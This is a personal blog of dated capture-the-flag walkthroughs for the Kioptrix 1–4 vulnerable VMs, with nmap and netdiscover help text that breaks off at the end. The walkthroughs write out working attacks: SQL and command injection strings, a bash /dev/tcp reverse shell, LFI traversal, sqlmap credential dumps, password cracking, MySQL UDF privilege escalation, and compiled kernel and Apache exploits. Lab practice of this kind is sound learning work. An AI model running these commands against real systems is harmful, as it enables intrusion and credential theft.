Saturday, March 30, 2019

Kioptrix4

netdiscover -r 192.168.0.0/24
nmap -sS -sV -T4 -AO 192.168.0.4
nikto -host 192.168.0.4 -port 80 -output kioptrix4.html
 enum4linux -a 192.168.0.4 | tee e4l.txt  nmap --script smb-enum-users 192.168.0.4 -oA nmapenumusers.txt
  nmap --script smb-enum-shares 192.168.0.4 -oA nmapenumshares.txt
  dirb http://192.168.0.4 /usr/share/wordlists/dirb/common.txt | tee dirb.txt
  vi dirb.txt
Knowing that the directory of john existed, based on the results from dirb, I directly opened john/john.php in browser

 Using the manual process to determine if the web site was vulnerable to SQL Injection, I simply added a to the Username and Password fields and then clicked the Login button.
Interesting, I discovered that there was a MySQL database and that the page of checklogin.php was being utilized.
Next, I decided to use the discovered SMB usernames with the blah’ OR 1 = 1 — -
or 'OR'1'='1
SQLInjection within the Password field.
 
ssh john@192.168.0.3
the account has limited access on shell
 
Knowing that Python was usually installed on Ubuntu by default, I decided to play around with the following example from the SANS documentation:
python: exit_code = os.system(‘/bin/sh’) output = os.popen(‘/bin/sh’).read()
After some time, I issued the echo command with the Python OS module of System in order to call /bin/bash.
echo os.system('/bin/bash');
tried sudo su
but no luck
cat /var/www/checklogin.php
found root password of mysql that is null
checked mysql is running with root or with different crendential
ps ef | grep mysql     it was running with root
  MySQL had a module called UDF (User-Defined Function). So, I issued the locate udf command to see if the library was installed on the system.


mysql -u root
select * from mysql.func; 
select sys_exec('usermod -a -G admin  john');
exit
sudo su
boom...u have root!!

read cat /root/congrats.txts

Sunday, March 10, 2019

kioptrix3

netdiscover -r 192.168.0.0/24

nmap -sS -T4 -oA 192.168.0.3

nikto -host 192.168.0.3 -port 80 -output nikto.html

searchsploit  -w lotuscms

we found remote code execution, so we can run this using msf, netcat and directly.

msfconsole: search lotuscms

use exploit/multi/http/lcms_php_exec

RHOST = IP address of the kioptrix3
RPort = 80
URI = / (as found in nmap and nikto)
LPORT = local port used on the Kali system to communicate from the RHOST

run
and you will get the console and can open passwd file but not shadow file.

tried to access home directories of the users:
In reviewing the /home/dreg directory, there was nothing interesting to review. However, reviewing the /home/loneferret directory turned up some interesting information.
 we found a CompanyPolicy.README file and it shows that loneferret can use sudo ht.

Further inspection of the /home/www/kioptrix3.com/gallery/gconfig.php file appears to have hard coded root credentials for the gallery database i.e fucyeyou.

Next, I launched a browser and returned to the Kioptrix web page. system’s IP Address (http://192.168.0.3/phpmyadmin).

exploring the database application we found 3 databases:

gallery
Information_schema
mysql

The gallery database contains a table called dev_accounts and we found username and hash password in that table.

Seeing that the local website used PHP, I tried to determine if the PHP scripts had been sanitized. I added the ../../../../../etc/passwd directly after the = sign within the URL.

Unfortunately, I did not receive any results. So, I turned to the Internet to research for PHP LFI vulnerabilities. In reading the OWASP Testing for Local File Inclusion” guide, it was noted that a null-byte terminator may be needed to signify the end of a string.
So, I re-entered the ../../../../../etc/passwd and added jpg at the end of the string. I added the jpg after the string as a technique suggested within the OWASP article.

http://192.168.0.3/index.php?system=../../../../../etc/passwdhtml

the attacking system must have its /etc/hosts file updated with an entry for kioptrix3.com. Otherwise, reference to kioptrix3.com will attempt to connect to the Internet and the image files may not be displayed correctly.

 sqlmap -u http://192.168.0.3/gallery/index.php
   sqlmap -u http://192.168.0.3/gallery/recent.php
   sqlmap -u http://192.168.0.3/gallery/g.php/1

The above mentioned commands will not give the sufficient result, so tried further.

Using the below commands we found the username and passwords

     sqlmap -u http://192.168.0.3/gallery/gallery.php?id=1&sort=photoid#photos
    
     sqlmap -u http://192.168.0.3/gallery/gallery.php?id=1&sort=photoid#photos

     sqlmap -u http://192.168.0.3/gallery/gallery.php?id=--dbs
     sqlmap -u http://192.168.0.3/gallery/gallery.php?id=-D gallery --tables
     sqlmap -u http://192.168.0.3/gallery/gallery.php?id=--dbs
     sqlmap -u http://192.168.0.3/gallery/gallery.php?id= --dbs
     sqlmap -u http://192.168.0.3/gallery/gallery.php?id=-D gallery --tables
     sqlmap -u http://192.168.0.3/gallery/gallery.php?id=-D gallery -T dev-accounts
     sqlmap -u http://192.168.0.3/gallery/gallery.php?id=-D gallery -T dev-accounts --dump
     sqlmap -u http://192.168.0.3/gallery/gallery.php?id= -D gallery -T dev_accounts --dump
     sqlmap -u http://192.168.0.3/gallery/gallery.php?id= -D mysql -T user --dump
     sqlmap -u http://192.168.0.3/gallery/gallery.php?id= -D mysql -T user --dump -C 'host, user, password'
  

Having both usernames from /etc/passwdand now the usernames and hashes from phpMyAdmin, I had enough information to use a password cracker to recover the credentials. I decided to use Hydra and HashCat.

Method 1:

I created a text file named users and added the loneferret and dreg usernames to the file. I then launched Hydra to do a brute force crack against the Kioptrix system using the following parameters:
· -L = Login File
· -P = Password File
· ssh = port
· -e nsr = n: null password, s: login and pass, and r: reversed login
· -f = exit after login/password found
· -t 4 = parallel number of connected tasks

   hydra -L /root/users -P /usr/share/wordlists/fasttrack.txt 192.168.0.3 ssh -e nsr -f -t 4

hashcat -m 0 -a 0 hash.txt /usr/share/wordlists/rockyou.txt -o kioptrix3.txt --force

 ssh loneferret@192.168.0.3 and password starwars
sudo -l



Unfortunately, I ran into an error opening the terminal with xterm-256color. I did some research and determined that if the export TERM=xterm command was used, it would by-pass the xterm-256color error.
sudo ht

  open /etc/sudoers
 and carefully update sudoer file

add ,/bin/sh directly after /usr/local/bin/ht  after using comma

save and exit

and use
sudo /bin/sh

you have root access!!




Wednesday, February 20, 2019

Kioptrix_level2

netdiscover -f -r 192.168.0.0/24

nmap -sS -T4 -A 192.168.0.9

 nikto -host 192.168.0.9 -port 80 -output nikto.html

SQL injection

username admin and password 'OR'1'='1

ping 127.0.0.1;cat /etc/passwd

;uname -ar

on kali linux: run nc -nlvp 443

on kioptrix   ; bash -i >& /dev/tcp/172.16.209.129/443 0>&1

you will get shell access on kali

run whoami

It will show apache

Now go back to kali

cat /etc/*-release it will show OS 4.5
 
run searchsploit -w linux kernel CentOS 
9545.c this one is for privilege escalation

python -m SimpleHTTPServer 80

wget http://kalilinuxIP/9545.c

after file getting downloaded

gcc -o priv 9545.c

chmod 755 priv

./priv

whoami  u will see root



cat .bash_history

Netdiscover

netdiscover [-i device] [-r range | -p] [-s time] [-n node] [-c count] [-f] [-S]
-i device -- The network interface to sniff and inject packets. If no interface is specified, first available will be used.
-r range -- Scan a given range instead of auto scan. Valid range values area for example: 192.168.0.0/24, 192.168.0.0/16 or 192.168.0.0/8.
-p -- Enable passive mode. In passive mode, netdiscover does not send anything, but does only sniff.
-s time -- Sleep given time in milliseconds between each arp request injection. (default 1)
-c count -- Number of times to send each arp request. Useful for networks with packet loss, so it will scan given times for each host.
-n node -- Last ip octet of the source ip used for scanning. You can change it if the default host is already used. (allowed range: 2 to 253, default 66)
-S -- Enable sleep time suppression between each request. If set, netdiscover will sleep after having scanned 255 hosts instead of sleeping after each one.
This mode was used in netdiscover 0.3 beta4 and before. Avoid this option in networks with packet loss, or in wireless networks with low signal level. (also called hardcore mode)
-f -- Enable fast mode scan. This will only scan for .1, .100 and .254 on each network. This mode is usefull while searching for ranges being used. After you found such range you can make a specific range scan to find online boxes.

Sunday, January 13, 2019

Pentest_Level1

nmap -sV <IP>
nmap -sV -sT -A -O -v <IP>
nmap -vvv -A -oA <IP>

nmap -p- -sV -sS -T4 -A<IP>

Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)

This apache version has vulnerability of openfuck. old openfuck.c is not working, so get the latest openfuck from github:  "https://github.com/heltonWernik/OpenLuck"

Use the steps and perform: like 
  1. Download OpenFuck.c
git clone https://github.com/heltonWernik/OpenFuck.git
  1. Install ssl-dev library
apt-get install libssl-dev
  1. Compile it
gcc -o OpenFuck OpenFuck.c -lcrypto
  1. Running the Exploit
./OpenFuck
  1. See which service you witch to exploit. For example if you need to Red Hat Linux, using apache version 1.3.20. Trying out using the 0x6a option ./OpenFuck 0x6a [Target Ip] [port] -c 40
for example:
./OpenFuck 0x6a 192.168.80.145 443 -c 40
enum4linux : use this command to check rpc login with null username and null password and to get other details.

samba version: to find the version of samba, use scanner

use auxiliary/scanner/smb/smb_version

samba: samba2.2.1a

this version has trans2open vulnerability and the exploit is available on metasploit

exploit: use exploit/linux/samba/trans2open

set payload with the exploit : set payload linux/x86/meterpreter/reverse_tcp (it will not work)
thn use any payload from below mentioned:
 set payload 
generic/shell_reverse_tcp
linux/x86/shell_bind_tcp
linux/x86/shell/bind_tcp
linux/x86/shell/reverse_tcp


NMAP

Nmap 5.61TEST5 ( http://nmap.org )
Usage: nmap [Scan Type(s)] [Options] {target specification}
TARGET SPECIFICATION:
  Can pass hostnames, IP addresses, networks, etc.
  Ex: scanme.nmap.org, microsoft.com/24, 192.168.0.1; 10.0.0-255.1-254
  -iL : Input from list of hosts/networks
  -iR : Choose random targets
  --exclude : Exclude hosts/networks
  --excludefile : Exclude list from file
HOST DISCOVERY:
  -sL: List Scan - simply list targets to scan
  -sn: Ping Scan - disable port scan
  -Pn: Treat all hosts as online -- skip host discovery
  -PS/PA/PU/PY[portlist]: TCP SYN/ACK, UDP or SCTP discovery to given ports
  -PE/PP/PM: ICMP echo, timestamp, and netmask request discovery probes
  -PO[protocol list]: IP Protocol Ping
  -n/-R: Never do DNS resolution/Always resolve [default: sometimes]
  --dns-servers : Specify custom DNS servers
  --system-dns: Use OS's DNS resolver
  --traceroute: Trace hop path to each host
SCAN TECHNIQUES:
  -sS/sT/sA/sW/sM: TCP SYN/Connect()/ACK/Window/Maimon scans
  -sU: UDP Scan
  -sN/sF/sX: TCP Null, FIN, and Xmas scans
  --scanflags : Customize TCP scan flags
  -sI : Idle scan
  -sY/sZ: SCTP INIT/COOKIE-ECHO scans
  -sO: IP protocol scan
  -b : FTP bounce scan
PORT SPECIFICATION AND SCAN ORDER:
  -p : Only scan specified ports
    Ex: -p22; -p1-65535; -p U:53,111,137,T:21-25,80,139,8080,S:9
  -F: Fast mode - Scan fewer ports than the default scan
  -r: Scan ports consecutively - don't randomize
  --top-ports : Scan  most common ports
  --port-ratio : Scan ports more common than 
SERVICE/VERSION DETECTION:
  -sV: Probe open ports to determine service/version info
  --version-intensity : Set from 0 (light) to 9 (try all probes)
  --version-light: Limit to most likely probes (intensity 2)
  --version-all: Try every single probe (intensity 9)
  --version-trace: Show detailed version scan activity (for debugging)
SCRIPT SCAN:
  -sC: equivalent to --script=default
  --script=:  is a comma separated list of
           directories, script-files or script-categories
  --script-args=: provide arguments to scripts
  --script-args-file=filename: provide NSE script args in a file
  --script-trace: Show all data sent and received
  --script-updatedb: Update the script database.
  --script-help=: Show help about scripts.
            is a comma separted list of script-files or
           script-categories.
OS DETECTION:
  -O: Enable OS detection
  --osscan-limit: Limit OS detection to promising targets
  --osscan-guess: Guess OS more aggressively
TIMING AND PERFORMANCE:
  Options which take